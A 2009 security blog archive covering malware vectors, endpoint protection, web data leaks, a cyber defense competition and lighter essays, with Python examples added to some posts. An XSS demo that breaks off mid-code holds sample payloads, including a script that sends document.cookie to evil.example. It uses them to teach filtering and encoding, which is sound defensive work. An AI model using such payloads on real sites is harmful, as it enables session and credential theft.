Malware and Flying Cars

  • At October 23, 2009
  • By Josh More
  • In Business Security

This blog entry collects the information from my recent presentation on Malware.

Overview

Let me start by making it clear that the world has recently changed. I’m not talking about Thomas L. Friedman, water on Mars or the 350 new species found in the Eastern Himalayas. No, I’m talking about malware.

Time was when malicious software was written by kids in the comfort of their own home. They were more interested in exploring computing technology and claiming bragging rights than in actually doing something with the systems they took over. If problems occurred, they were mostly accidental. Today it’s different. Today malicious software is written by criminals for the purpose of making money. In yesterday’s world, you could get a computer virus and then launch a cleanup tool. Then, as it removed the infection, you were free to sit and ponder the lovely flying cars that we’d have in the future. Today, you could get a computer virus and never notice, then when you check your bank balance online, all your money could be transferred overseas while you ponder the fact we still don’t have our flying cars.

A lot has been written about different classifications of malware, and the differences between worms, viruses, trojans and the like. I see no need to repeat what’s been done before. Instead, I’d like to look at how malware can get on your system, what it can do once it’s there and what you can do about it.

Vectors

One way to get malware into the world is to just toss it onto the Web. There tend to be three ways this is done. The easiest is for them to just put up their own website. However, if they do this, they have the same problem you might in driving traffic there. Sure, they can do all the basic advertising and search engine optimization (SEO) techniques to drive folks there, but in the end, people just won’t go to a boring website. Instead, it helps to have a hook.

Though one would think that all it would take is making a fancy website about the new flying cars out there, the more common hook that we’re seeing today is to play on people’s fears. In this case, fears of malware. Yes, we are seeing sites out there designed to resemble anti-malware sites… that exist to spread malware. They’ll even try to leverage current-events fears, so if a legitimate company has an issue with one of their products, you’ll probably start seeing ads appear stating things like “Problem with [Company]? Try [Fake Antivirus]!”. You hit one of these sites, and it pops up a little dialog box saying that there may be a problem and asks whether you’d like to run a scan. When you click “Yes” (or “No”, they’re awfully helpful), it will pretend to run a scan, pretend to find problems and then offer you a lovely little cleanup utility. You download and run it, and promptly get infected. Then, just to pour salt in the wound, you’ll likely get a bill for removal services. Sophos reports that there are 15 new sites like this discovered daily.

A more difficult, but often more successful technique is to target a popular social networking site with a good reputation (not an unpopular one with a bad reputation). Social media sites are successful because regular users can post content. So, once there, they post content and try to get people to download it. If you go to a website and see a friend posting something about this cool video about flying cars, you can get infected, and your account starts posting the flying car malware too. That’s when your friends get into the mix. Since the content is being posted as you, it’s viewed as “safe”, so they download it and then they also get infected. In May, there was a quite successful attack of this type that was linked to a viral (in more ways than one) video of somewhat questionable taste.

The most difficult way, but often the most rewarding attack, is to take over an already popular website. Most of the big sites on the Internet are pretty well protected these days, but if they manage to get control of one, they can load it up with malware. In fact, recent analysis has shown that some websites carry around 18,000 pieces of malware. These attacks go on all the time. Sometimes they are general, as in earlier this year when there was an Internet-wide attack that aimed to find flaws in backend databases. Sometimes, though, sites are specially targeted, as in April when Paul McCartney’s website was hacked and all his visitors were infected with malware that stole their online banking usernames and passwords. Thus, the more interesting you are, the more of a target you will be. (Boring people should be safer.)

Of course, there are more than just web vectors. The second most popular attack is via email. It’s important to remember that email is fundamentally flawed. It was intended to serve email just within a local campus and was neither sufficiently scalable nor secure to be used in the way it is today. One fundamental problem is that anyone can send any email to anyone from anywhere. While there are a few technologies in place that limit this, the vast majority of attacks use this flaw.

So what does that mean? Basically, if an attacker can uncover a trusted relationship between you and someone else, all they have to do is send you an email as if it were from that person. You receive the email from good old Uncle Johnny and, without puzzling over the fact that he was killed in that tragic flying falling car accident, you open it and suddenly get infected. Of course, not everyone has a (poor old) Uncle Johnny, so the attackers will use whatever they can to get you to open the email. Oftentimes, this involves riding a popularity wave. Anytime we see news about a natural disaster or a celebrity death, there will be malware-laden spam in its wake — earthquakes producing tidal waves of infections.

Remember, organizations like the FBI and IRS send letters, not emails. If there’s a problem with a package delivery, your customer will call you, not UPS or DHL. If you get an email from someone you don’t expect, there’s a good chance that it also contains what you don’t expect.

Of course, the traditional attacks still work, so CDs, DVDs, BluRays, Floppies, media cards and USB are still legitimate vectors. In fact, some enterprising folks have managed to infect a keyboard. The basic principle here is to take over a system through any of the avenues into it. Thus, if you use a cell phone for email or connect an mp3 player up to your system, they can be suspicious too.

Lastly, there is the ever-popular “just break in” method. Every month, Microsoft releases patches. Every quarter, Adobe and Oracle do the same. In the open source world, patches come out hourly. Each one of these fixes a known issue. Some of them are remotely exploitable, meaning that if you don’t have them in place, an attacker can waltz right in and do what they wish. If you use a firewall but don’t keep up on patches, it’s like having a machine gun turret on your flying car, but ignoring the suspension problem. It’s going to catch up to you just like it did to Uncle Johnny.

Impact

So, once it infects you, what does this malware actually do? Well, short form: anything it wants. By the time the malware is running, it’s too late. It can grab your passwords as you use them, it can search your disk for sensitive data and copy it offsite, it can wait for you to login to your banking system and start transferring all of your money overseas while simultaneously interfering with your web browser so that everything looks normal. (There’s a lot of this latter going on right now.)

More, it can just sit there and wait for orders. Often, infected machines will gang together and form a “botnet” that is centrally controlled by a small group of attackers. The attackers can use these systems to send spam, steal user names, passwords, account numbers, credit card numbers, and so on. They can also rent these “services” to others if the price is right.

Analysis

What can you be doing about all this?

In addition to basic server and network hardening (firewall, disable unneeded applications, layers of defense, etc), you should deploy a complete endpoint security solution. Unlike previous versions of anti-malware that just matched signatures, a complete endpoint solution contains multiple features. You need to consider:

Anti-virus

Even though the old style of signature matching is considered passé, all those old attacks are still out there. You have to protect against them somehow and this isn’t a bad way.

Behavior-based Profiling

In addition to signatures, anti-malware systems can also look at what applications are actually doing. This used to be called “heuristics”, but these days tends to be called something like “suspicious behaviour detection” or “pre-execution analysis”. The way it works is to load a small environment around each application and detect what it’s going to do before it does it. If it’s something bad, it stops it. Please note that it is very important that this functions as “pre-execution” and not “during execution”. If it runs at the same time that the application does, there is a chance that the malicious behavior will run before the anti-malware system can stop it.

Firewall

This is a different sort of firewall than your Cisco ASA or Astaro (or the kind on a car, flying or otherwise). This is a host-level firewall that protects the server/workstation itself. The problem here isn’t to duplicate what the network firewall does, it’s to protect a layer where the network firewall cannot. If an attacker manages to get in to one of your workstations, in a normal network, they can then attack all the other workstations on that network. A local firewall protects against attacks pivoting within the same zone to take over more and more of your network.

Traditionally, host-based firewalls have been difficult to manage, but modern endpoint protection systems have central management consoles that make this easier.

Application Control

The idea behind application control is simply that a central authority can determine which applications may or may not be run on a system. In the ideal world, of course, all users would have minimal privilege levels and not be allowed to run non-approved software. However, since many Windows applications require administrative privileges, you need another layer. Application control is this layer.

Web Browser Helper Objects

Some malware these days never touches the disk. When you hit a compromised site in your browser, it loads the malware into memory. Once there, it can look at browser traffic, analyze what you’re doing and take over sessions. Since it never hits the disk, it’s not detectable by traditional scanning technologies. Anti-malware solutions that have a Helper Object feature can protect your browser from this sort of malware. It basically wraps the browser and analyzes the pages you visit, providing a layer of protection.

Zero Day Protection

There is necessarily a delay between the discovery of a vulnerability and the availability of a patch. If malware is released during this delay, it’s called a Zero Day Exploit. A system that offers good Zero Day protection combines heuristics with a knowledge of system vulnerability types to catch problems before they take over a system. While it is impossible to ever achieve 100% protection against Zero Day Exploits, the good anti-malware suites are tested against these. You just have to pick one that does well in the independent tests.

Optional: Encryption

Some systems are including the ability to manage local encryption. This can protect important data against casual spying and theft. It’s worth noting that if the malware can manage to run at all, it can just wait until you decrypt the data to view it. However, it does add another layer and if you typically deal with sensitive data, it is worth considering.

Optional: Network Access Control

Network Access Control (NAC) allows your anti-malware system to communicate with your network infrastructure. In the old model, all a machine has to do to connect to the network is be plugged in. With NAC, you layer additional checks such as patch status and whether anti-malware services are running. This would be like a built-in breathalyzer in a flying car. (Can you imagine the drunk driving problem we’d have there?) It’s not been widely accepted yet, but it is growing. In the near future, it will likely be standard, so it would be wise to at least select a vendor that has experience in this field.

Optional: Data Loss Prevention

This technology is aware of the type of data that you work with and will examine it when it is accessed. If there is a rule against allowing that data to leave the network, the DLP system will block access to it. It is worth noting that this technology is still quite new and new technologies generally have a few bumps on the way to adoption. If the anti-malware system includes it, great… but it’s probably not essential quite yet.

Optional: Reporting

Some industries are unregulated and can just get by doing the best business they can. Most anti-malware systems these days have decent consoles that can be used to get a snapshot of activity. This is generally sufficient for most day-to-day operations. But, within a regulated or audited business, it can be important to show trends of activity over time. For this, you need a more robust reporting capability. Sadly, most systems do not include this in the basic package. However, if you have this need, be sure to ask about additional packages. It may be available.

Optional: Lightweight, Frequent Updates

I’ll admit that I’m biased. I like the systems that give me constant updates. If I had a flying car, I’d want to always know about potential problems so I could correct for them. I wouldn’t like it when those updates are big and bring my systems (or my car) down. However, it’s not a requirement per se. If your business doesn’t access the Internet often, slower and bigger updates may work just fine for you. On the other hand, if you have a distributed environment with branch offices or remote workers, consider the impact of pushing out updates.

Time Tested

There are some interesting new approaches in the world of anti-malware. While these are always worth considering, you should also be aware that this is a lot more complex than people think. Even the big vendors have had some pretty embarrassing problems as they grew their business. By all means, check out the newer players, but keep in mind that rocky starts are common in both business and software development. Do you want these rocky starts in your security software?

Also, if you want to check out the newer players, keep in mind that attackers are creating fake anti-malware sites and filling up the search engine listings with links to them. At the very least, pull the list and links from reviews in reputable journals. The last thing you need is to think you’re evaluating anti-malware when in fact you are installing malware itself.

Company Operations

Some anti-malware companies try to reduce their pricing by reducing service levels. From a business perspective, I understand this. It allows you to pick the level of service you want and pay accordingly. However, with security software and service, there is a huge value in responsiveness and operating hours. If there is a new outbreak on the Internet, you want to know that the company is addressing it. If you have a new outbreak, you want to be able to pick up the phone and get help… not an invitation to purchase the new “Uranium Level Tech Support”. (In general I feel that metallurgy belongs in my flying car, not in my technical support.)

Home and Mobile Use

These days, the idea of having a “secure” network is gone. If you allow users to connect to the network from their home or with their various smart phones, there are far too many ways into the network to keep it secure at the perimeter. This means that the concept of “endpoint” extends out to computers that you don’t own. Luckily, some anti-malware vendors provide “bonus” licenses to cover home PCs and mobile devices. This way you can make sure that all the systems have a level of protection, even if they’re not exactly yours. If you’re advanced enough to be running NAC (above), you can even enforce connection requirements.

Multiplatform and Legacy Issues

If you are completely on the ball, and are only running the absolute latest and greatest operating systems and vehicles, congratulations! Most of us aren’t there (and are still driving pathetic land-bound conveyances). If you have a handful of older systems or systems running different operating systems, you may have a challenge with anti-malware. Many systems still require a separate console for each OS and some of them don’t even support the older systems. Keep this in mind during your evaluations.

Conclusion

In the end, if you have money, you are a target. While running anti-malware isn’t a perfect solution, it is certainly part of a measured response to the problem. As malware gets increasingly nasty, you have to step up your defenses. I am assuming that you already have a firewall in place and have your servers reasonably configured. The next step would be endpoint protection. Sure, there are many, many steps after this, but just having these three layers will get you in a position where there are many easier targets than you… which buys you the time to get proactive about things.

This essay was originally published by Alliance Technologies

Small Business Defense – Web Disclosure

  • At October 22, 2009
  • By Josh More
  • In Business Security

The best defense you have against an accidental data leak is to keep a clear data classification policy and invest in technology that prevents data tagged “private” (or “non public”) from being released.  However, that’s not practical for many businesses.

As an alternative, you can flip it around and run attacks against your own servers.  You can do file-level scans and make sure that the only files made public are the ones that are supposed to be.  Note though, that an attacker could always find your scanning software and use that to explore the system (as I did).
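One way to do the file-level scan described above, as an added example that is not the post’s own tooling: the web root is compared against a manifest of the files that are meant to be public, and anything extra, missing, or named like a backup, dump or repository leftover is reported. The web root, the manifest and the suspicious-name patterns are all constructed assumptions for the example.

```python
"""Audit a web root against a manifest of files that are meant to be public.

Added example, not from the original post. Assumes a plain-text manifest with
one path per line, relative to the web root. Reports three things:
  unexpected - on disk but not in the manifest (the leak candidates)
  suspicious - name looks like a backup, dump, secret or VCS leftover
  missing    - in the manifest but not on disk (a deployment problem)
"""
import os
import re
import tempfile

# Assumed patterns; illustrative choices, not a list from the original post.
SUSPICIOUS_NAME = re.compile(
    r"(\.(bak|old|orig|sql|swp|tar|gz|zip)$|~$|^\.(env|htpasswd)$)",
    re.IGNORECASE,
)
HIDDEN_DIRS = {".git", ".svn", ".hg"}


def load_manifest(path):
    """Return the set of relative paths listed in the manifest file."""
    with open(path, encoding="utf-8") as fh:
        return {ln.strip() for ln in fh if ln.strip() and not ln.startswith("#")}


def walk_webroot(root):
    """Yield every regular file under root as a forward-slash relative path."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            yield rel.replace(os.sep, "/")


def looks_suspicious(rel_path):
    """True if any directory component is a VCS dir or the basename matches."""
    parts = rel_path.split("/")
    if any(p in HIDDEN_DIRS for p in parts[:-1]):
        return True
    return bool(SUSPICIOUS_NAME.search(parts[-1]))


def audit_webroot(root, allowed):
    """Compare the files actually on disk with the files meant to be public."""
    on_disk = set(walk_webroot(root))
    return {
        "unexpected": sorted(on_disk - allowed),
        "suspicious": sorted(p for p in on_disk if looks_suspicious(p)),
        "missing": sorted(allowed - on_disk),
    }


def build_sample_site():
    """Create a constructed web root and manifest; returns (root, manifest)."""
    base = tempfile.mkdtemp(prefix="webaudit_")
    root = os.path.join(base, "htdocs")
    files = {
        "index.html": "<h1>hello</h1>",
        "about.html": "<p>about</p>",
        "css/site.css": "body{}",
        "admin/config.php.bak": "<?php $db_pass = 'example';",  # editor leftover
        "reports/board_minutes.pdf": "%PDF-1.4",               # never meant to be public
        ".git/config": "[core]",                               # exposed repo metadata
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    manifest = os.path.join(base, "public.manifest")
    with open(manifest, "w", encoding="utf-8") as fh:
        # contact.html is listed but was never deployed
        fh.write("# files intended to be public\nindex.html\nabout.html\ncss/site.css\ncontact.html\n")
    return root, manifest


if __name__ == "__main__":
    root, manifest = build_sample_site()
    for kind, paths in audit_webroot(root, load_manifest(manifest)).items():
        print(kind, paths)
```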

Alternatively alternatively, you could run various Google scans against your systems.  You could even schedule them to occur on a regular basis.  Of course, the scans would only be as good as the person setting them up and it would be quite possible that something could slip through.  Of course, regardless, you’re only catching things this way once Google knows about them… and then attackers might be able to get them too.

You could also just not have any public Web presence at all.  If there’s no web site, there’s no chance of data leakage… but it would also make it difficult to get new business.  The same goes for not having any private data.  Unless you’re working strictly with open source, odds are that you’re going to have some secret.

You know, a data classification program is starting to look more appealing.

Small Business Attack – Web Disclosure

  • At October 21, 2009
  • By Josh More
  • In Business Security

One of the flaws on a legacy server at the Iowa State University Cyber Defense Competition resulted in granting me the ability to scan the entire web directory. Normally, you’d think “What’s the big deal”, right? After all, the whole point of having a web server is to share it with the world.

In the case of the competition, some very private data was stored on the site. Sure, it was protected, but since there was the flaw that let me scan the system, it was easy enough to circumvent security restrictions and download the files I wanted. After all, I knew exactly where to look.

In the industry, we call this a “data leak”. Typically, it’s when private data somehow wanders across a boundary to the public world and someone on the outside finds it. This used to be primarily done via email or disk, but increasingly it occurs through the Web. As we combine web-based technologies into both extranets and intranets, the chance increases that something from the internal intranet world will cross over into the external extranet world.

Of course, it should be simple, right? Just keep the private stuff private… well, sorta. It turns out, not all information falls cleanly into “public” and “private” categories. Increasingly, attackers target private data, but if they can’t get it, they can leverage sorta-private data against sorta-public data. By finding, for example, the names of your board members on a public website, their mother’s maiden names from a genealogy site, and their personal associations from a search engine, an attacker is in the perfect position to start taking over accounts and working towards that more private data… and that’s just with purely public information.

Imagine if they were able to get confidential or private data…

Security Lessons from Nature – Units of Measurement

  • At October 20, 2009
  • By Josh More
  • In Natural History

One thing that was hammered into me as I pursued my Physics degree was the importance of specifying units in my answers. Unlike my fellow students who chose to study Math, those of us in Physics actually had work that meant something. ;) At the time, I thought that my teachers were just being annoying, as it was pretty obvious what the units were.

Well, as it turns out, the reason that units matter in Physics is that they help to build physical intuition. Since all answers match (at least, theoretically) reality, you can do a quick check against the answer at the end and make sure it makes sense (well, usually).

However, the reason that this works at all is because we defined all the units a long time ago. The International System of Units (which, for some stupid reason involving non-English languages, we abbreviate as “SI”), defines a unit for everything we have to measure and does so in such a way that it is standardized throughout the world.

  • The meter measures length, and is defined as the length of the path travelled by light in vacuum during a time interval of 1/299 792 458 of a second.
  • The second measures time and is the duration of 9 192 631 770 periods of the radiation corresponding to the transition between the two hyperfine levels of the ground state of the cesium 133 atom.
  • The kelvin measures temperature and is the fraction 1/273.16 of the thermodynamic temperature of the triple point of water.
  • The candela measures luminous intensity, in a given direction, of a source that emits monochromatic radiation of frequency 540 × 10^12 hertz and that has a radiant intensity in that direction of 1/683 watt per steradian.

Now, sure, for historical reasons, we have had to fix the values of the units to some pretty arbitrary numbers.  However, whenever someone says that something is a second long, everyone knows exactly what they mean (unless it’s a justasecond, which is quite a bit longer).  That is the advantage of scientific consensus.

Which, of course, makes certain aspects of business difficult. Test of Time Design recently pointed out the problems with comparing yourself to your competition. Really though, the problem compounds when your competition starts comparing themselves to you too. That way, you build a vicious cycle of measurement and are soon making decisions based on metrics that are drifting further and further from reality.

I think that we tend to fall into the trap of measuring the easy things instead of the things that really matter. For example, there are many retail establishments that measure their progress against last year’s performance. What does that really measure? After all, you’re measuring in dollars, and the value of a dollar changes over time. If you base your business decisions on a constantly-changing unit, you have no idea if the changes you are making matter.

We see this problem in the security field as well. Many of us bemoan the lack of decent security metrics. Really, what we want to measure is how much we’re protecting the organization. However, it’s clear that the right way to measure that would be to wait until your company gets breached, figure out what it cost, travel back in time, put up defenses. Then you simply measure the cost of the breach and the cost of the defense, a little subtraction, and you know exactly what your solution is worth.

Alas, time travel can be tricky. So, we have to resort to other methods. There are communities doing some very interesting work in this subject. There are formal methods that are used in enterprises.  However, those models tend to take time to work through… often time that the small business doesn’t have in the first place.  Luckily, there’s another option.

Just fall back to physical intuition. Even if you can’t make a precise measurement of the weight of a brick, you can know that it’s going to hurt like hell when one hundred of them land on you. Similarly, you don’t need to know exactly what it will save you to deploy a security technology. You just need to look at the cost of the technology and ask yourself “if something bad happened, what would that cost me and how likely is it to happen?” Will this model work for a large enterprise where security solutions cost hundreds of thousands of dollars and can take up to a year to implement? Of course not. However, for small and medium sized business, most common security solutions are inexpensive enough that a rough intuitive calculation will probably do just fine.

Mythic Monday – Ozymandias

  • At October 19, 2009
  • By Josh More
  • In Mythology

A bit of poetry to start your week:

Ozymandias by Percy Bysshe Shelley

I met a traveller from an antique land
Who said: “Two vast and trunkless legs of stone
Stand in the desert. Near them on the sand,
Half sunk, a shattered visage lies, whose frown
And wrinkled lip and sneer of cold command
Tell that its sculptor well those passions read
Which yet survive, stamped on these lifeless things,
The hand that mocked them and the heart that fed.
And on the pedestal these words appear:
‘My name is Ozymandias, King of Kings:
Look on my works, ye mighty, and despair!’
Nothing beside remains. Round the decay
Of that colossal wreck, boundless and bare,
The lone and level sands stretch far away”.

Ozymandias (who we now know as Ramesses the Great) was an Egyptian king who many consider to be the most important one ever.

( probably translates as “World’s Greatest Pharaoh” and was found on a mug*, probably given by Prince Ramesses-Meriamen-Nebweben in a desperate plea for attention.)

*Not really.

As tempting as it is to go off on the typical history geek listing of great accomplishments, I’ll just point you to the Wikipedia Link instead.  Besides, it’s more fun to look at Shelley’s poem.  The point, fairly obviously, is that Ozymandias was one impressive guy in his day.  He was the Grand Poobah of all of Egypt, did a lot of impressive stuff and was well nigh irreplaceable.  Today, little remains of what he did, we get his name wrong in history and make fun of him in blog posts.  He was vital in his day and was utterly erased by the sands of time.

(Granted, due to advances in archeology, we know that this isn’t historically true… but we’re talking about a poem from 1818 (and this blog is ostensibly about IT security anyway, so we’re going to ignore the truth in favor of the lesson.))

We all know people like Ozymandias. Many of them, for some reason, seem to find jobs as IT administrators or developers. They may protect their knowledge within a little silo whilst claiming “job security”. They may build large and complex systems and brag about how they are so complex that no one can ever figure out how to support them. They may resist applying updates or integrating their systems in with everything else, because it’s their legacy. They may also be laid off in the next round.

The problem is that actually, Ozymandias was pretty impressive. He was the most important person in his sphere (being Egypt from 1279 BC to 1213 BC). However, he was clearly not the most important person ever (Bing says that was Juanita Gooden’s mother, Google is less certain) and his works have clearly not survived. The same applies to those special isolated IT systems.

The sad fact is that people don’t last forever, and whether they retire or move on, the systems they leave behind won’t last forever either. In fact, if there is a system that others were never allowed to maintain, it will often age even more quickly than other legacy solutions. No one will be able to troubleshoot it or update it for changing business conditions. It will begin to fail and then the business owners will likely look at purchasing a system to replace it.

Sadly, when this occurs, it serves to commoditize the business just a little bit more. Over time, that which makes a business unique will be eroded by the sands of time and when the business fails, nothing will be left but ruins. Then, three thousand years later, some historico-business-poet* will write something about the former technology and how greatness doesn’t last.

*OK, you tell me when they’ll call industry analysts in three thousand years.

The thing is, this could have been avoided. An empire does not exist solely for one man… nor does a business. If the business can identify those protectionist silos and work towards integrating them with the rest of the operations, not only can technological similarities be leveraged but it would be possible to add developers or maintainers and accelerate the adaptability of the business. This would drive the business away from becoming a commodity… then they just have to wait for the other businesses to slowly crumble into dust and they emerge victorious.

(Image by Hajor.)

Mythic Natural History – Encapsulation

  • At October 16, 2009
  • By Josh More
  • In Mythology, Natural History

Yesterday (as I write this), I was privileged to attend the Iowa State University Cyber Defense Competition. The basic idea is that you have students build a handful of servers that must withstand attack from the “red team” while simultaneously providing services.

Though I generally specialize in Linux defense, I did manage some successful attacks against both operating systems. There was one team that watched the network and blocked some of the IP addresses that were attacking them. There was another that was hiding behind a firewall appliance.  However, what was most interesting was the level of awareness that different teams had about what I was doing. Generally, once I connected via an encrypted session, the admins let me do whatever I wanted to do. I could try exploit after exploit with no interference at all. Odds are, if they were watching me at all, they were looking at network traffic. As such, I was hidden from their view due to encapsulation.

TechTarget defines encapsulation as: “In general, encapsulation is the inclusion of one thing within another thing so that the included thing is not apparent. Decapsulation is the removal or the making apparent a thing previously encapsulated.” . . . but this is boring. I could go on at length about how TCP/IP has layers like an onion (or an ogre), or I could just point you over to The TCP/IP Guide. However, since TCP/IP is also boring, I’ll let you go read about it yourself.

Instead, I want to talk about the Mayans. After the competition, I was relaxing at home by reading a book of Mesoamerican Myth, and I got to a part that told how Xbalanque and Hunahpu (let’s call them Xbally and Huna for short) were contacted by their grandmother. Apparently, the spread of the Internet had not reached the Yucatán Peninsula by 250 AD, so when their grandmother wished to send them a message, she didn’t send them an instant message. Instead, she told a louse.

Now, it is clearly ridiculous to think of a louse able to carry a message all the way to the Eastern end of the Earth (likely Tulum), which is why it was most fortunate that the louse was swallowed by a toad. The toad, of course, was eaten by a snake, which was gobbled up by a hawk. The hawk then flew to Xbally and Huna. Of course, the hawk could not give them the message directly. He had to first disgorge the snake, which spit up the toad which vomited up the louse (you can’t keep a good louse down), which delivered the message. At which point, our pals Xbally and Huna went off to the underworld to work for some strangely-named underworld gods, avenge their father and otherwise exit the interesting part of our story.

See, the message couldn’t get there on its own. No matter how loud someone shouts, there’s a limited distance along which the message may be understood. Thus, it helps to encapsulate the message inside a louse (SSH). If anyone looks at the louse, they just think “eew, louse!” and not “hey, maybe that louse contains a secret message”. Even if the louse were cut open, it wouldn’t reveal anything other than louse guts. The message is well concealed.

However, even though a louse is a good way to hide in plain sight, it’s not so good at crossing distances. Particularly if the terrain is somewhat marshy. That’s why, if you don’t want the message to drown, you’d better put it in a toad (UDP). This way, the delivery is more robust.

(As an aside, I chose UDP over TCP for this analogy, because otherwise at the end of the story, Xbally and Huna would have to find another louse, give it a message that says that they got the message, shove it in the toad, feed the toad to the snake, let the hawk eat the snake and send the snake back to their grandmother… and that would just be silly.)

A toad, however, doesn’t do so well in all environments. It may be able to hop over a desert, but it would take a while and it could get lost. That’s why toads are more comfortable inside of snakes (IP). The snake has a more complex brain and can remember more of the environment than a toad can. Thus, instead of just hopping from puddle to puddle in the hope that it’s going the right way, the snake can take a more direct route… within its own little area. Snakes are, alas, not so good at crossing barriers like mountains and chasms. For that, you want a hawk (Link Layer). The hawk is used to flying and tends to have a good solid understanding of its environment. When it flies, even if snake-laden, the hawk can get where it needs to go quite quickly by flying through the air (Layer 1).

Thus, by combining all four animals (or Link, IP, UDP and SSH), you can get a message securely to where it needs to go. True, these days we use somewhat obscure mechanisms to do so, but hey, these days lice are relatively rare.

It’s a good tradeoff.
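For the curious, here is the louse-toad-snake-hawk stack built by hand. This is an added example, not code from the post or from the competition; the MAC and IP addresses, the ports and the message are made up, and the “SSH” layer is a toy XOR keystream that stands in for a real cipher only to make the payload opaque (it has no authentication and must not be used for anything real). The point it demonstrates is the one above: the admins watching the wire can read every outer header (who, to whom, which port) but get nothing from the innermost layer without the key, and decapsulation peels exactly the headers that encapsulation added.

```python
import hashlib
import socket
import struct

# Constructed addresses for the example (assumptions, not from the post).
SRC_MAC = bytes.fromhex("020000000001")
DST_MAC = bytes.fromhex("020000000002")
SRC_IP, DST_IP = "10.0.0.1", "10.0.0.2"
ETHERTYPE_IPV4 = 0x0800
PROTO_UDP = 17


def ipv4_checksum(header: bytes) -> int:
    """Ones'-complement sum over the IPv4 header; over a header that already
    carries a valid checksum it returns 0, which is how receivers verify it."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def toy_encrypt(message: bytes, key: bytes) -> bytes:
    """Toy stand-in for SSH (the louse): XOR with a SHA-256 keystream.
    NOT a real cipher: no nonce, no integrity; it only makes the bytes opaque."""
    out = bytearray()
    for i in range(0, len(message), 32):
        block = hashlib.sha256(key + struct.pack("!I", i // 32)).digest()
        out += bytes(a ^ b for a, b in zip(message[i:i + 32], block))
    return bytes(out)


toy_decrypt = toy_encrypt  # XOR is its own inverse


def build_udp(src_port: int, dst_port: int, payload: bytes) -> bytes:
    # The toad. Checksum 0 means "not computed", which IPv4 permits for UDP.
    return struct.pack("!HHHH", src_port, dst_port, 8 + len(payload), 0) + payload


def build_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    # The snake: version/IHL, DSCP, total length, ID, flags (DF set), TTL,
    # protocol, checksum placeholder, source and destination addresses.
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0x4000, 64,
                      proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:] + payload


def build_ethernet(src_mac: bytes, dst_mac: bytes, ethertype: int, payload: bytes) -> bytes:
    # The hawk.
    return dst_mac + src_mac + struct.pack("!H", ethertype) + payload


def encapsulate(message: bytes, key: bytes) -> bytes:
    """Louse in toad in snake in hawk: message -> toy SSH -> UDP -> IP -> Ethernet."""
    louse = toy_encrypt(message, key)
    toad = build_udp(40000, 22, louse)
    snake = build_ipv4(SRC_IP, DST_IP, PROTO_UDP, toad)
    return build_ethernet(SRC_MAC, DST_MAC, ETHERTYPE_IPV4, snake)


def monitor_view(frame: bytes) -> dict:
    """What the admins watching the wire see without the key: who is talking to
    whom, on which ports, and an opaque blob. Each layer is read from its own header."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    udp = ip[ihl:]
    sport, dport, ulen, _ = struct.unpack("!HHHH", udp[:8])
    return {"ethertype": ethertype, "src": socket.inet_ntoa(ip[12:16]),
            "dst": socket.inet_ntoa(ip[16:20]), "proto": ip[9],
            "sport": sport, "dport": dport, "payload": udp[8:ulen]}


def decapsulate(frame: bytes, key: bytes) -> bytes:
    """Hawk disgorges snake, snake spits up toad, toad coughs up louse, louse speaks."""
    ihl = (frame[14] & 0x0F) * 4
    if ipv4_checksum(frame[14:14 + ihl]) != 0:
        raise ValueError("IPv4 header checksum mismatch")
    view = monitor_view(frame)
    if view["proto"] != PROTO_UDP:
        raise ValueError("not UDP")
    return toy_decrypt(view["payload"], key)


if __name__ == "__main__":
    frame = encapsulate(b"meet me at the eastern end of the earth", b"grandmother")
    print(monitor_view(frame))            # addresses and ports; payload is gibberish
    print(decapsulate(frame, b"grandmother"))
```

Run it and compare the two printed lines: the monitor view is everything a network-only defender gets, and the plaintext only appears once the right key is applied at the innermost layer. That is why the teams watching traffic let an encrypted session do whatever it liked; to see inside the louse you need host-side visibility (process, file and authentication logs), not just the wire.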

Small Business Defense – Cross Site Scripting

  • At October 15, 2009
  • By Josh More
  • In Business Security
  • 0

Let’s start with some basic assumptions:

  1. You must have a website to do business in today’s world.
  2. Your customers have to be able to post content, either on your website or on a shared third-party site that you have to use to communicate with them (Twitter, Facebook or LinkedIn).
  3. That communication method will be attacked.

So, you have two scenarios.  Your own website or a third party website.

If it’s your own website, you have a bit more control.  There are techniques that you can use to limit cross site scripting.  The common advice is to use a whitelist of “good” characters and filter out everything else.  That’s not hard to do, actually.  However, input filtering only protects the entry points you remembered to filter, and unless it was designed into the system from the start it is very difficult to find every one of them.  The complementary defense is to encode untrusted data at the point where it is written into the page, so that anything that slipped past the filter is rendered as text rather than as markup.
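To make the two techniques concrete, here is an added example (mine, not code from the post) that runs a few constructed customer comments through a character whitelist and through HTML output encoding, then uses Python’s own HTML parser to show which tags and event handlers a browser would actually act on. The sample comments and the rendering function are assumptions for the illustration.

```python
import html
import re
from html.parser import HTMLParser

# Constructed comments a customer might post (assumptions, not from the post).
SAMPLES = [
    "Great product, will buy again!",
    "<script>document.location='http://evil.example/?c='+document.cookie</script>",
    '"><img src=x onerror=alert(1)>',
    "Café Müller's review",
]

# Whitelist of "good" characters; everything else is dropped on input.
NOT_ALLOWED = re.compile(r"[^A-Za-z0-9 .,!?'-]")


def whitelist_filter(text: str) -> str:
    """Input-side defence from the post: keep only whitelisted characters."""
    return NOT_ALLOWED.sub("", text)


def encode_for_html(text: str) -> str:
    """Output-side defence: make <, >, &, and both quotes inert in an HTML text node."""
    return html.escape(text, quote=True)


def render_vulnerable(comment: str) -> str:
    # Untrusted text dropped straight into the page.
    return f"<p class='comment'>{comment}</p>"


def render_safe(comment: str) -> str:
    # Same page, but the text is encoded at the moment it is written out.
    return f"<p class='comment'>{encode_for_html(comment)}</p>"


class TagCollector(HTMLParser):
    """Records the tags and on* event-handler attributes a browser would act on."""

    def __init__(self):
        super().__init__()
        self.tags, self.handlers = [], []

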